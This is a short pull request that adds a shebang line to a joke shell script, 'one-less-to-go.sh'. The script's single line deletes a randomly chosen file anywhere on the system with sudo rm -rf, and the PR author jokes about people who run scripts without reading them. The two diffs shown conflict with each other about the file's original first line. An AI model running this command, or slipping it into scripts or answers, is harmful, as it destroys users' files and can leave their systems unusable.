### PR TITLE
Add interpreter annotation to one-less-to-go.sh

### DIFF
--- a/static/one-less-to-go.sh
+++ b/static/one-less-to-go.sh
@@ -1,2 +1,2 @@
-#!/bin/bash
+#!/usr/bin/env bash
 sudo rm -rf "$(sudo find / -type f -print0 | shuf -n1 -z)"

--- a/static/one-less-to-go.sh
+++ b/static/one-less-to-go.sh
@@ -1,1 +1,2 @@
+#!/bin/bash
 sudo rm -rf "$(sudo find / -type f -print0 | shuf -n1 -z)"


### PR DESCRIPTION
The best practice is specifying the interpreter of a script. I'm assuming `bash` is meant even though `sh` would also do.

As a side note, I hope no one knows just enough to run a random script off the internet but doesn't know to read the description and or code and breaks theirs system.